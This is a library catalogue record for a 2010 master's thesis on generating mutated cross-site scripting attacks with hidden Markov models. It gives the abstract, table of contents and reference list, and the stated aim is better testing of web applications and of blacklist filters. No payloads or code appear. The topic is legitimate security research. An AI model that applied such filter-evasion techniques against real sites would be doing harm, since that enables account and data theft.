Basic Search / Detailed Display

Author: 王奕勛
Yi-Hsun Wang
Thesis Title: 利用攻擊向量的結構學習產生跨網站變形攻擊
Structural Learning of Attack Vectors for Mutated XSS Attacks Generation
Advisor: 李漢銘
Hahn-Ming Lee
Committee: 林豐澤
Feng-Tse Lin
Jung-Ying Wang
Hsing-Kuo Pao
Degree: 碩士
Department: 電資學院 - 資訊工程系
Department of Computer Science and Information Engineering
Thesis Publication Year: 2010
Graduation Academic Year: 98
Language: 英文
Pages: 71
Keywords (in Chinese): 跨網站攻擊網站應用程式安全馬可夫模型貝氏理論變形攻擊
Keywords (in other languages): Web Security, XSS, HMM, Bayes theorem, Mutation
Reference times: Clicks: 234Downloads: 2
School Collection Retrieve National Library Collection Retrieve Error Report

(1) 自動地從實際資料的分析到塑模一個攻擊向量的結構模型,以學習攻擊向量
的結構,(2) 模仿攻擊向量的組成手法及元素以擴展跨網站弱點測試工具的測試
能力,(3) 有助於驗證網站應用程式中以黑名單方式過濾輸入的函式的弱點。

Cross-site scripting (XSS) attacks inWeb applications can bypass the access control to
gain elevated access privileges and resulted from incomplete or incorrect input saniti-
zation. Either the programmers or the security experts use automatic testing tools that
are equipped predefined attack vectors or manually craft attack vectors for identify-
ing XSS vulnerabilities, it is short of mutation mechanism that helps the discovery of
diverse manifestation of potential vulnerabilities. Learning the structure of attack vec-
tors could enrich the variety of manifestations in generated XSS attacks for identifying
XSS vulnerabilities.
In this study, we focus on the generation of threatening XSS attacks for the state-
of-the-art detection approaches that can find potential XSS vulnerabilities in web ap-
plications. We proposed a structural learning mechanism for generating the mutated
XSS attacks in a fully automatic way. Mutated XSS attack generation depends on the
analysis of attack vectors and the structural learning mechanism. For the kernel of the
learning mechanism, the hidden Markov model (HMM) is applied to present the struc-
ture of the attack vector model for capturing the implicit manner of the attack vector.
These manners benefited from the syntax meanings that are labeled by the proposed
tokenizing mechanism. Bayes’ Theorem is used to determine the number of hidden states in the model for generalizing the attack vector model. We evaluate the proposed
mechanism by Burp Intruder with a dataset collected from public XSS archives. The
experimental results demonstrate that mutated XSS attack generation can identify potential
The proposed technique aims at testing Web applications by learning the elements
and implicit structures existed in XSS attacks. Furthermore, this method could increase
the probability of finding XSS vulnerabilities in black-box or white-box testing. We
give the contributions of this study: (1) automatically learn the structure of attack
vectors from practical data analysis to modeling a structure model of attack vectors,
(2) mimic the manners and the elements of attack vectors to extend the ability of testing
tool for identifying XSS vulnerabilities, (3) be helpful to verify the flaws of blacklist
sanitization procedures of Web applications.

ABSTRACT i ACKNOWLEDGEMENTS iii 1 Introduction 1 1.1 Motivation 2 1.2 Problem Definition and Goal 5 1.3 Thesis Contribution 6 1.4 The Outline of Thesis 7 2 RelatedWork 8 2.1 Static Analysis 8 2.2 Black-box Testing 10 2.3 Hybrid Testing 12 3 Generation of Mutated XSS Attacks 14 3.1 Attack Vector Tokenizer 15 3.1.1 XSS Attack Locator 16 3.1.2 Token Extractor 17 3.2 Structural Learning of Attack Vectors 17 3.2.1 Attack Vector Structure Learning 18 3.2.2 Attack Vector Profile 20 3.3 Mutated Attack Generator 20 4 Experiment and Results 22 4.1 Experiment Design and Dataset 22 4.1.1 Experiment Concept and Description 23 4.1.2 Dataset Description 24 4.2 Evaluation Metrics 26 4.3 Numerical Results and Case Studies 27 4.4 Discussion 31 5 Conclusion and FurtherWork 34 A Appendix 44

[1] S. Artzi, A. Kiezun, J. Dolby, F. Tip, D. Dig, A. Paradkar, and M. D. Ernst, “Find-
ing bugs in dynamic web applications,” in Proceedings of the 2008 international
symposium on Software testing and analysis, July 20–24 2008, pp. 261–272.
[2] D. Balzarotti, M. Cova, V. Felmetsger, N. Jovanovic, E. Kirda, C. Kruegel, and
G. Vigna, “Saner: Composing static and dynamic analysis to validate sanitization
in web applications,” in Proceedings of the 2008 IEEE Symposium on Security
and Privacy, Oakland, California, USA, May 18–21 2008, pp. 387–401.
[3] J. Bau, E. Bursztein, D. Gupta, and J. Mitchell, “State of the art: Automated
black-box web application vulnerability testing,” in Proceedings of the 2010
IEEE Symposium on Security and Privacy, Oakland, California, USA, May 16–
19 2010, pp. 332–345.
[4] C. T. Company, “Paros 3.2.13,” Auguest 2006. [Online]. Available: http:
[5] CPAN.ORG, “Html parser class,” April 2010. [Online]. Available: http:
// gaas/HTML-Parser-3.65/
[6] CPAN.ORG, “Html::entities,” April 2010. [Online]. Available: http://search. gaas/HTML-Parser-3.65/lib/HTML/
[7] CPAN.ORG, “Uri::escape,” March 2010. [Online]. Available: http://search.cpan.
org/ gaas/URI-1.54/URI/
[8] P. Dupont, F. Denis, and Y. Esposito, “Links between probabilistic automata and
hidden markov models: Probability distributions, learning models and induction
algorithms,” Pattern Recognition, vol. 38, no. 9, pp. 1349–1371, September 2005.
[9] K. Fernandez and D. Pagkalos, “Xssed project,” February 2007. [Online].
[10] P. Fogla, M. Sharif, R. Perdisci, O. Kolesnikov, andW. Lee, “Polymorphic blending
attacks,” in Proceedings of the 15th USENIX Security Symposium, July 31–
August 4 2006, pp. 241–256.
[11] Fourthdimension, “Stealing cookie with xss,” April 2009. [Online]. Available:
[12] W. G. J. Halfond, S. R. Choudhary, and A. Orso, “Penetration testing with improved
input vector identification,” in Proceedings of the 2009 International Conference
on Software Testing Verification and Validation, Denver, Colorado, USA,
April 1–4 2009, pp. 346–355.
[13] S. Hansman and R. Hunt, “A taxonomy of network and computer attacks,” Computers
and Security, vol. 24, no. 1, pp. 31–43, 2005.
[14] Y.-W. Huang, S.-K. Huang, T.-P. Lin, and C.-H. Tsai, “Web application security
assessment by fault injection and behavior monitoring,” in Proceedings of the
12th international conference on World Wide Web, May 20–24 2003, pp. 148–
[15] Y.-W. Huang, C.-H. Tsai, T.-P. Lin, S.-K. Huang, D.-T. Lee, and S.-Y. Kuo, “A
testing framework for web application security assessment,” Computer Network,
vol. 48, no. 5, pp. 739–761, 2005.
[16] G. Inc., “,” 2010. [Online]. Available:
[17] N. Jovanovic, C. Kruegel, and E. Kirda, “Pixy: A static analysis tool for detecting
web application vulnerabilities (short paper),” in Proceedings of the 2006 IEEE
Symposium on Security and Privacy, Berkeley/Oakland, California, USA, May
21–24 2006, pp. 258–263.
[18] S. Kals, E. Kirda, C. Kruegel, and N. Jovanovic, “Secubat: A web vulnerability
scanner,” in Proceedings of the 15th international conference onWorldWideWeb,
Edinburgh, Scotland, UK, May 23–26 2006, pp. 247–256.
[19] A. Kieyzun, P. J. Guo, K. Jayaraman, and M. D. Ernst, “Automatic creation of sql
injection and cross-site scripting attacks,” in Proceedings of the 31st International
Conference on Software Engineering, Vancouver, Canada, May 16–24 2009, pp.
[20] M. Martin and M. S. Lam, “Automatic generation of xss and sql injection attacks
with goal-directed model checking,” in Proceedings of the 17th conference on
Security symposium, Boston, Massachusetts, June 22–27 2008, pp. 31–43.
[21] S. McAllister, E. Kirda, and C. Kruegel, “Leveraging user interactions for indepth
testing of web applications,” in Proceedings of the 11th International
Symposium on Recent Advances in Intrusion Detection, Massachusetts, USA,
September 15–17 2008, pp. 191–210.
[22] Methodman and DP, “Xss, iframe injections and xmlhttp post request errors
on mcafee sites,” May 2009. [Online]. Available:
XSS Iframe injections and XMLHTTP post request errors on McAfee sites/
[23] Y. Minamide, “Static approximation of dynamically generated web pages,” in
Proceedings of the 14th international conference on World Wide Web, Chiba,
Japan, May 10–14 2005, pp. 432–441.
[24] Mrmunkey22, “Schoolmate 1.5.4,” November 2004. [Online]. Available:
[25] R. Naraine, “Strongwebmail ceo’s mail account hacked via xss,”
June 2009. [Online]. Available:
[26], “May 2010 web server survey,” May 2010. [Online]. Available:
[27] J. Offutt, Y. Wu, X. Du, and H. Huang, “Bypass testing of web applications,” in
Proceedings of the 15th International Symposium on Software Reliability Engineering,
St-Malo, France, November 02–05 2004, pp. 187–197.
[28] O. S. V. D. (OSVDB), “phpmyadmin xss protection string blacklist bypass,”
March 2007. [Online]. Available:
[29] OWASP, “Owasp cal9000 project,” December 2009. [Online]. Available: CAL9000 Project
[30] OWASP, “Cross-site scripting (xss),” 2 2010. [Online]. Available: http:
// Scripting (XSS)
[31] OWASP, “Owasp top 10 project,” 2010. [Online]. Available: http://www.owasp.
org/index.php/Category:OWASP$ $Top$ $Ten$ $Project
[32], “htmlspecialchars,” 2001. [Online]. Available:
[33] PortSwigger, “Burp intruder 1.3.03,” May 2010. [Online]. Available: http:
[34] N. Provos, P. Mavrommatis, M. A. Rajab, and F. Monrose, “All your iframes point
to us,” in Proceedings of the 17th conference on USENIX Security Symposium,
San Jose, CA, July 28August 1 2008, pp. 1–15.
[35] N. Provos, D. McNamee, P. Mavrommatis, K. Wang, and N. Modadugu, “The
ghost in the browser analysis of web-based malware,” in Proceedings of the first
conference on First Workshop on Hot Topics in Understanding Botnets, Cambridge,
MA, April 20 2007, p. 4.
[36] L. R. Rabiner and B.-H. Juang, “An introduction to hidden markov models,”
ASSP Magazine, IEEE, vol. 3, no. 1, pp. 4–16, January 1986.
[37] Roflo1 and Sandking, “Webchess 0.9.0,” September 2004. [Online]. Available:
[38] RSnake, “Xss (cross site scripting) cheat sheet,” 2009. [Online]. Available:
[39], “Security definition-attack vector,” Jan 2007. [Online].
[40] H. Shahriar and M. Zulkernine, “Automatic testing of program security vulnerabilities,”
in Proceedings of the 33rd Annual IEEE International Computer Software
and Applications Conference, vol. 2, Seattle,Washington, USA, July 20–24
2009, pp. 550–555.
[41], “Websites of who and mi5 hacked using xss attacks,”
Auguest 2009. [Online]. Available:
[42] A. Stolcke, “Bayesian learning of probabilistic language models,” Ph.D. dissertation,
Berkeley, CA: University of California, 1994.
[43] A. Stolcke and S. Omohundro, “Hidden markov model induction by bayesian
model merging,” in Advances in Neural Information Processing Systems, vol. 5,
San Mateo, CA, 1993, pp. 11–18.
[44] A. Stolcke and S. M. Omohundro, “Best-first model merging for hidden markov
model induction,” International Computer Science Institute, Berkeley, Ca, Tech.
Rep., 1994.
[45] N. Surribas, “Wapiti 2.2.1,” December 2009. [Online]. Available: http:
[46] R. T. F. Tim Berners-Lee and L. Masinter, RFC3986-Uniform Resource
Identifiers (URI): Generic Syntax, Std., January 2005. [Online]. Available:
[47] URL, “Wikipedia.” [Online]. Available:
Resource Locator
[48] G. Vigna, W. Robertson, and D. Balzarotti, “Testing network-based intrusion detection
signatures using mutant exploits,” in Proceedings of the ACM Conference
on Computer and Communication Security, Washington, DC, USA, October 25–
29 2004, pp. 21–30.
[49] A. J. Viterbi, “Error bounds for convolutional codes and an asymptotically optimum
decoding algorithm,” IEEE Transactions on Information Theory, vol. 13,
no. 2, pp. 260–269, April 1967.
[50], “Html tutorial.” [Online]. Available: http://www.w3schools.
[51] Y.-H. Wang, C.-H. Mao, and H.-M. Lee, “Structural learning of attack vectors
for generating mutated xss attacks,” in being appearing in the fourth International
Workshop on Testing, Analysis and Verification of Web Software, Antwerp,
Belgium, September 21 2010.
[52] G. Wassermann and Z. Su, “Sound and precise analysis of web applications for
injection vulnerabilities,” SIGPLAN Notice, vol. 42, no. 6, pp. 32–41, 2007.
[53] G. Wassermann and Z. Su, “Static detection of cross-site scripting vulnerabilities,”
in Proceedings of the 30th International Conference on Software Engineering,
Leipzig, Germany, May 10-18 2008, pp. 171–180.